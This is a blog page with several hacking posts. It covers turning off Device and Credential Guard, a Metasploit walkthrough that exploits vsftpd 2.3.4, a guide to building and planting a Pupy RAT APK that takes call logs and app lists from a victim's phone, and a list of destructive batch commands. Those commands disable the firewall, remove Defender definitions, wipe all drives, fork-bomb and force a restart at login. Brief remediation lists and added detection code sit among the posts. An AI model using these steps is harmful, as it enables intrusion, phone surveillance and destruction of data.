Friday, October 25, 2019

VMware Workstation and Device/Credential Guard are not compatible Fix


1. In the search box, type "gpedit", then
    go to Computer Configuration -> Administrative Templates -> System -> Device Guard -> Turn On Virtualization Based Security. Double-click it and select "Disabled".
2. In the search box, type "Turn Windows features on or off".
    Uncheck Hyper-V and restart the system.
3. Open Registry Editor by typing regedit in the search box.
    Go to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceGuard. Add a new DWORD value named EnableVirtualizationBasedSecurity and set it to 0 to disable it.
    Next, go to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA. Add a new DWORD value named LsaCfgFlags and set it to 0 to disable it.
4. Open a command prompt as an administrator and type the following commands.
    Then copy and paste the rest below and press Enter.
        bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader
        bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\SecConfig.efi"
        bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215}
        bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions DISABLE-LSA-ISO,DISABLE-VBS
        bcdedit /set hypervisorlaunchtype off
        shutdown -r  -t 00

Your system will now restart.

Hack a Machine Within 6 Steps !!!


Note: this is purely for educational purposes; I am not responsible for anything. Do it at your own risk! This blog shows how to defend ourselves. Learn defending techniques.

Yes, we can hack a machine/laptop within 6 steps. My main aim was gaining backdoor access to a laptop, and showing how to defend against this type of attack.

Requirements:
1. Metasploit
2. Nmap
3. Kali Linux (optional OS)

Step 1:

Here I am using Kali Linux with the above requirements (this machine and the victim machine must be connected to the same network).
Open a terminal and enter Metasploit by using this command:
# msfconsole

Step 2:
Now we are inside the console. Scan the victim machine by IP address or host name using Nmap (the victim's IP address was 192.168.1.11):
# nmap -sV 192.168.1.11


Step 3:

Here you will get all the ports, services and version numbers of the victim machine.
Now I have taken one of the applications which is not updated and whose payload is already in Metasploit. Choose wisely while selecting the service. Here vsftpd is on open port 21 and that service is outdated, so I targeted this port to get backdoor access.
# search vsftpd 2.3.4


Step 4:

By entering the above command, we can see the payload available in Metasploit.
# use xxxxxxxx (copy the payload full name)
Now we are inside the exploit, and we have to set it up.


Step 5:

# show options
# set RHOST 192.168.1.11
# show options 


Step 6:

# exploit 


That's it, we are inside the victim's machine.



How to defend against this type of attack?


1. Update the OS
2. Update applications regularly
3. Close unwanted ports
4. Stop unwanted services
5. Browse the internet safely
6. Maintain a genuine antivirus and operating system
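
Defence items 2 to 4 can be checked from the same kind of `nmap -sV` output described in Step 3. The following is an added example, not part of the original post: it audits a scan of your own host against a policy, and the scan text, approved ports and minimum versions are all constructed assumptions.

```python
import re

# Constructed `nmap -sV` output for one of your own hosts (sample data).
SAMPLE_SCAN = """\
PORT   STATE  SERVICE VERSION
21/tcp open   ftp     vsftpd 2.3.4
22/tcp open   ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
23/tcp open   telnet  Linux telnetd
80/tcp closed http
"""

# Assumed policy: ports allowed to be open, and the oldest acceptable versions.
APPROVED_PORTS = {21, 22}
MIN_VERSIONS = {"vsftpd": (3, 0, 5), "OpenSSH": (8, 9)}

PORT_LINE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\S+)\s+\S+\s*(.*)$")


def parse_version(text):
    """Return the leading dotted version in text as a tuple of ints, or None."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    return tuple(int(p) for p in m.group(0).split(".")) if m else None


def audit_scan(scan_text, approved_ports, min_versions):
    """Return (port, finding) for every open port that breaks the policy."""
    findings = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group(2) != "open":
            continue  # header lines and closed/filtered ports
        port, banner = int(m.group(1)), m.group(3)
        if port not in approved_ports:
            findings.append((port, "unapproved open port: close it or stop the service"))
            continue
        product, _, rest = banner.partition(" ")
        minimum, found = min_versions.get(product), parse_version(rest)
        if minimum and (found is None or found < minimum):
            shown = rest.split(" ")[0] or "unknown version"
            floor = ".".join(map(str, minimum))
            findings.append((port, f"{product} {shown} is older than {floor}: update it"))
    return findings


if __name__ == "__main__":
    for port, finding in audit_scan(SAMPLE_SCAN, APPROVED_PORTS, MIN_VERSIONS):
        print(f"{port}: {finding}")
```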




THANK YOU !!!

Hack Android with Pupy

Android Hacking by Pupy

Pupy is a cross-platform, multi-function RAT and post-exploitation tool. It can communicate using multiple transports, migrate into processes using reflective injection, and load remote Python code, Python packages and Python C-extensions from memory.

Machine Used : Kali Linux
IP used (Pvt)   : 192.168.3.234

Step 1: 

Run the commands below on the Linux machine:

CMD # apt-get update
CMD # apt-get upgrade
CMD # git clone https://github.com/n1nj4sec/pupy.git  
CMD # service apache2 start        
CMD # service apache2 status   

Step 2:

Run the following command to generate apk with payload
CMD #  . /pupygen.py -O android -o /var/www/html/kashy.apk



Step 3:

Now navigate to pupy folder and Start pupysh.py
CMD # ./pupysh.py 

 


Step 4:

Install the apk into the victim phone 


Step 5:

Now go back to Kali Linux and run the “help” command to display all the commands we can use, as shown in the images below.





Step 6:

Now we extract the call history of the mobile. Type “call –a –output-folder /root/c” to collect the call history into folder c in the root directory.
CMD # call –a –output-folder /root/c 
 

Step 7:

Type “apps –a –d” to list all installed applications in the Victim mobile
CMD # apps –a –d
 

Step 8:

Type “get_info” to display the victim mobile's info and “ls” to list folders.
CMD # get_info
CMD # ls 
 



Remediations:

  1. Do not install third-party apps on the mobile without knowing anything about them
  2. Use antivirus software
  3. Enable Play Protect and disable installing apps from unknown sources
  4. Keep the system up to date

Ref : https://github.com/n1nj4sec/pupy 

Author: A KashYap.
Website: https://kashy1712.blogspot.com/

Wednesday, October 02, 2019

Batch Script Tricks

-------------------------------------------------------------------------------------------------------------------
Windows Firewall Bypass
  • netsh advfirewall set allprofiles state off
  • c:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All Set-MpPreference - DisableIOAVProtection $true
  • netsh advfirewall set allprofiles state on


-------------------------------------------------------------------------------------------------------------------
Block Google
  • @echo off
  • cd "C:\Windows\System32\Drivers\etc"
  • echo 127.0.0.1 google.com » "Hosts"
  • echo 127.0.0.1 www.google.com » "Hosts"


-------------------------------------------------------------------------------------------------------------------
Del files from Desktop

  • del /f /q "C:\Users\%username%\Desktop\*.*"


-------------------------------------------------------------------------------------------------------------------
Make Random folders

  • @echo off
  • :kashy
  • md %random%
  • goto kashy


-------------------------------------------------------------------------------------------------------------------
Make the Computer Freeze Using Batch Programming

  • %0|%0


-------------------------------------------------------------------------------------------------------------------
Message Pop up
  • :kashy
  • msg * hi
  • goto :kashy


-------------------------------------------------------------------------------------------------------------------
Shutdown With a Message in 1712 seconds

  • start shutdown -s -t 1712 -c "You Have Been Hacked"



Abort Shutdown 

  • shutdown -a


-------------------------------------------------------------------------------------------------------------------
run as admin

  • runas /user:%username% cmd.exe


-------------------------------------------------------------------------------------------------------------------
To Change all exe to kash

  • assoc.exe=kash


Retrieve

  • assoc.exe=.exe


-------------------------------------------------------------------------------------------------------------------
IP address flush & Renew

  • ipconfig/all
  • ipconfig/renew
  • ipconfig/flushdns


-------------------------------------------------------------------------------------------------------------------
To Lock the System after 1712 seconds

  • @echo off
  • timeout /t 1712 /nobreak & rundll32.exe user32.dll,LockWorkStation


-------------------------------------------------------------------------------------------------------------------
Make the system restart as soon as the user logs in

  • cd C:\Users\%Username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • echo shutdown /r  > a.bat


-------------------------------------------------------------------------------------------------------------------
Change time to 17:12

  • @echo off
  • time 17:12


-------------------------------------------------------------------------------------------------------------------
Delete My Documents, My Music, My Pictures etc...

  • @echo off
  • del /f /q "C:\Users\%userprofile%\My Documents\*.*"
  • del /f /q "C:\Users\%userprofile%\My Music\*.*"
  • del /f /q "C:\Users\%userprofile%\My Pictures\*.*

-------------------------------------------------------------------------------------------------------------------
Swap Mouse Button:

  • @echo off
  • Rundll32 user32,SwapMouseButton


-------------------------------------------------------------------------------------------------------------------
Erase All Drives 

  • @echo off
  • del A:*.* /f /s /q
  • del B:*.* /f /s /q
  • del C:*.* /f /s /q
  • del D:*.* /f /s /q
  • del E:*.* /f /s /q
  • del F:*.* /f /s /q
  • del G:*.* /f /s /q
  • del H:*.* /f /s /q
  • del I:*.* /f /s /q
  • del J:*.* /f /s /q
  • del K:*.* /f /s /q
  • del L:*.* /f /s /q
  • del M:*.* /f /s /q
  • del N:*.* /f /s /q
  • del O:*.* /f /s /q
  • del P:*.* /f /s /q
  • del Q:*.* /f /s /q
  • del R:*.* /f /s /q
  • del S:*.* /f /s /q
  • del T:*.* /f /s /q
  • del U:*.* /f /s /q
  • del V:*.* /f /s /q
  • del W:*.* /f /s /q
  • del X:*.* /f /s /q
  • del Y:*.* /f /s /q
  • del Z:*.* /f /s /q


-------------------------------------------------------------------------------------------------------------------
Ping of Death on 192.168.0.1

  • start ping 192.168.0.1 -t -l 65500


-------------------------------------------------------------------------------------------------------------------
Add Firewall Rule to allow TCP connection with name Open Port

  • netsh advfirewall firewall add rule name="Open Port %1" dir=in action=allow protocol=TCP localport=%1 remoteip=127.0.0.1


-------------------------------------------------------------------------------------------------------------------
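
Detection logic for the defender side of the commands in this post and of the bcdedit commands in the Device Guard post above, as an added example that is not the author's code: it matches process-creation command lines against rules for firewall, Defender and VBS/Credential Guard tampering. The record format, host names, users and rule names are constructed assumptions.

```python
import re

# Rules derived from commands shown on this page; the rule names are this example's own.
# echo, del, md and assoc are cmd.exe builtins: inside a .bat they start no process,
# so hosts-file, Startup-folder and file-association changes need file/registry telemetry.
RULES = [
    ("firewall_disabled", r'netsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b'),
    ("firewall_allow_rule", r'netsh(\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b.*action=allow'),
    ("defender_defs_removed", r'mpcmdrun(\.exe)?"?\s+-removedefinitions'),
    ("defender_scan_disabled", r'set-mppreference\b.*-\s*disableioavprotection'),
    ("vbs_credguard_disabled",
     r'bcdedit(\.exe)?\s+/set\b.*(hypervisorlaunchtype\s+off|disable-lsa-iso|disable-vbs)'),
    ("oversized_ping_loop", r'ping(\.exe)?\s.*-t\b.*-l\s+6\d{4}\b'),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Constructed process-creation records: time | host | user | command line.
SAMPLE_EVENTS = """\
2019-10-02T09:14:03Z | WS-017 | alice | netsh advfirewall set allprofiles state off
2019-10-02T09:14:04Z | WS-017 | alice | "c:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All
2019-10-02T09:15:40Z | WS-017 | alice | ipconfig /flushdns
2019-10-02T09:16:12Z | WS-017 | alice | netsh advfirewall set allprofiles state on
2019-10-25T11:02:55Z | WS-030 | bob | bcdedit /set hypervisorlaunchtype off
"""


def detect(events_text):
    """Return (time, host, rule) for each record whose command line hits a rule."""
    alerts = []
    for line in events_text.splitlines():
        parts = [p.strip() for p in line.split("|", 3)]  # command line may contain '|'
        if len(parts) != 4:
            continue  # skip malformed records
        when, host, _user, cmdline = parts
        alerts += [(when, host, name) for name, rx in COMPILED if rx.search(cmdline)]
    return alerts


def hosts_with_chained_tampering(alerts, minimum=2):
    """Hosts where at least `minimum` different rules fired (review these first)."""
    per_host = {}
    for _when, host, name in alerts:
        per_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= minimum)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    print(found, hosts_with_chained_tampering(found))
```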